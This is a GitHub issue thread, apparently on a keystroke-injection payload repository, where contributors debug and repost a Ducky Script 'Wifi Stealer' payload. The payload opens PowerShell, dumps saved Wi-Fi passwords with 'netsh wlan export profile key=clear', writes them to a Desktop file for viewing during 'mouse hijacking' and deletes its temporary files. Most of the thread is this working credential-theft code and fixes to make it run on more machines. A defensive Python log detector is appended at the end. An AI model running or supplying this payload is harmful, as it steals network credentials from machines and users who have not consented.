Closed the0bone closed 2 years ago
Hello! Nice to see it being used! :)
What is your Windows version?
My original payload was French/US based; the payload tried both directories with a cd Desktop;cd Bureau, but I took it off for international purposes. Maybe you can just add the Desktop folder name corresponding to your language or change the WI-FI- to WLAN-. Normally, on a standard session, opening PowerShell with GUI R puts us in the user folder, so then you just need to go to the desktop folder so that the script can reduce all the windows and locate the 0.txt to open it and zoom into
Tested it on Win10 Pro and Win11 Home.
To avoid issues, I'm currently working on setting up all files in %temp% and having the Text file done first.
New-Item -Path $env:temp -Name "js2k3kd4nne5dhsk" -ItemType "directory"; Set-Location -Path "$env:temp\\js2k3kd4nne5dhsk"; netsh wlan export profile key=clear; Select-String -Path *.xml -Pattern 'keyMaterial'> 0.txt;
From here I just need to copy it and can easily Remove-Item $env:temp\js2k3kd4nne5dhsk
But I just saw another topic:
Seems that not all phrases are stored in cleartext. :(
I have already seen that. It is because the key is pre-shared or not: if the password of the Wi-Fi network comes from another user, the pre-shared key is encrypted to pass it to another user. This is also a workaround to harden this Windows "feature".
@7h30th3r0n3 as a workaround for languages etc. I try to use Notepad. If you open Notepad from %temp% in PowerShell... Where does it point to? notepad.exe 0.txt ENTER DELAY 4000 CTRL-SHIFT S
In my tests Notepad likes to store the opened file on the Desktop, where we want to have the file.
Total idea looks like:
REM Creating a new folder in Temp with random name to store the xml files and create single text file.
New-Item -Path $env:temp -Name "js2k3kd4nne5dhsk" -ItemType "directory"; Set-Location -Path "$env:temp\\js2k3kd4nne5dhsk"; netsh wlan export profile key=clear; Select-String -Path *.xml -Pattern 'keyMaterial'> 0.txt;
DELAY 4000
REM Open the editor to store the text file on the user's Desktop even if that is a OneDrive folder.
notepad.exe 0.txt
ENTER
DELAY 4000
CTRL-SHIFT S
ENTER
ALT F4
DELAY 500
REM The editor should be closed and the cursor is back in PowerShell to clean up the work and exit it.
cd ..; Remove-Item -Path "$env:tmp/js2k3kd4nne5dhsk" -Force -Recurse; exit
This is now working with OneDrive Accounts where Desktop is linked to the MS Account.
REM Title: Wifi Stealer
REM Author: 7h30th3r0n3
REM Reworked: the0bone
REM Target: Windows 7/8/10/11
REM Version: 1.2
REM Category: Grabber
REM Extracts the SSID and wifi shared key and puts them in a txt file named 0.txt on the desktop
REM Designed to be used for mouse hijacking on a machine whose screen is visible
GUI r
DELAY 500
STRING powershell
ENTER
DELAY 6000
REM Creating a new folder in Temp with random name to store the xml files and create single text file.
STRING New-Item -Path $env:temp -Name "js2k3kd4nne5dhsk" -ItemType "directory"; Set-Location -Path "$env:temp/js2k3kd4nne5dhsk"; netsh wlan export profile key=clear; Select-String -Path *.xml -Pattern 'keyMaterial'> 0.txt;
ENTER
DELAY 4000
REM Open the editor to store the text file on the user's Desktop even if that is a OneDrive folder.
STRING notepad.exe 0.txt
ENTER
DELAY 2000
CTRL-SHIFT S
ENTER
ALT F4
DELAY 2000
REM The editor should be closed and the cursor is back in PowerShell to clean up the work and exit it.
STRING Set-Location -Path "$env:temp"; Remove-Item -Path "$env:tmp/js2k3kd4nne5dhsk" -Force -Recurse; exit
ENTER
I need to test out to see if it works everywhere ;) Also, it seems that you have mixed the two payloads, the wifi stealer and the wifi stealer zoom. The payload wifi stealer zoom zooms in the notepad for a few seconds in order to be able to retrieve the information visually with a photo or binoculars when you are mouse hijacking. I'm on my phone, but I think it's just a mis-copy-paste of the REM section :) The delay seems to be a little bit high too, but yeah, let me do some tests with it and I will make a PR afterwards. Thank you for the investment and the warning :)
Excellent discussions. Once this gets sorted out we can make any recommended changes. Thanks, @the0bone!
Feel free to do a PR when ready (or @7h30th3r0n3 too.) =)
> I need to test out to see if it works everywhere
No it did not. :( Tested on 8 PCs with different setups. Just 3 worked.
Positive: WLAN-*.xml and WiFi-*.xml issue is sorted out with the own folder.
Negative: The Editor is not always pointing to the same folder.
Still to do: Find a way to the Desktop for OneDrive synced and non-synced users.
> No it did not. :( Tested on 8 PCs with different setups. Just 3 worked.
Oh... what a pity... Do you know where it comes from?
> Positive: WLAN-*.xml and WiFi-*.xml issue is sorted out with the own folder.
I checked this one and yeah, it seems possible to fix that quickly; the *.xml is more efficient than the WI-FI* ;)
> Still to do: Find a way to the Desktop for OneDrive synced and non-synced users.
Maybe you can use the official Windows API with
$DesktopPath=[Environment]::GetFolderPath("Desktop")
to save it on the Desktop. I don't know if it works with OneDrive synced users...
Yes, also the Hak5 community brought that solution up.
Set-Location ([Environment]::GetFolderPath("Desktop"))
I'll play around with that later in the day.
Tested and PR created.
@7h30th3r0n3 and @johnmckee02 thanks for the script. But
Different languages use different file names. Wi-Fi is not used in Germany, for example; the XML files start with WLAN-*.
In addition, especially on accounts that are connected to a OneDrive account, the %userprofile% is different from the c:\user\xyz\desktop\ folder. So even if the files are created, zooming in will bring up nothing.
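For defenders reading this thread, an added example (not part of the original issue or the payload repository) that flags the `netsh wlan export profile key=clear` step discussed above in process-creation or script-block log text. The event dictionaries, host names and field names are constructed sample data; matching `show profile ... key=clear` as well goes slightly beyond the one command in the thread.

```python
import re

# netsh in the wlan context, exporting or showing profiles; "rest" holds the
# remaining arguments up to the next command separator.
NETSH_WLAN = re.compile(
    r'\bnetsh(?:\.exe)?["\']?\s+wlan\s+(?:export|show)\s+profiles?\b'
    r'(?P<rest>[^;|&\r\n]*)',
    re.IGNORECASE,
)
# Only key=clear asks netsh for the key in plain text.
KEY_CLEAR = re.compile(r'\bkey\s*=\s*"?clear\b', re.IGNORECASE)

def find_cleartext_export(command_line):
    """Return the matching netsh fragment if it requests cleartext keys, else None."""
    for m in NETSH_WLAN.finditer(command_line):
        if KEY_CLEAR.search(m.group("rest")):
            return m.group(0).strip()
    return None

def triage(events):
    """Return one hit per event whose command line dumps Wi-Fi keys in cleartext."""
    hits = []
    for ev in events:
        frag = find_cleartext_export(ev["command_line"])
        if frag:
            hits.append({"host": ev["host"], "parent": ev["parent"], "match": frag})
    return hits

# Constructed sample events (hypothetical hosts and field names).
EVENTS = [
    {"host": "WS-01", "parent": "explorer.exe",
     "command_line": "New-Item -Path $env:temp -Name \"d\" -ItemType \"directory\"; "
                     "netsh wlan export profile key=clear; "
                     "Select-String -Path *.xml -Pattern 'keyMaterial'> 0.txt;"},
    {"host": "WS-02", "parent": "powershell.exe",
     "command_line": r'"C:\Windows\system32\netsh.exe" wlan export profile key=clear'},
    {"host": "WS-03", "parent": "cmd.exe",
     "command_line": "NETSH  WLAN SHOW PROFILE name=Office KEY=CLEAR"},
    {"host": "WS-04", "parent": "cmd.exe",       # benign: lists profile names only
     "command_line": "netsh wlan show profiles"},
    {"host": "WS-05", "parent": "backup.exe",    # benign: no key=clear requested
     "command_line": r"netsh wlan export profile folder=C:\Backup"},
]

if __name__ == "__main__":
    for hit in triage(EVENTS):
        print(f'{hit["host"]}: parent={hit["parent"]} match={hit["match"]}')
```
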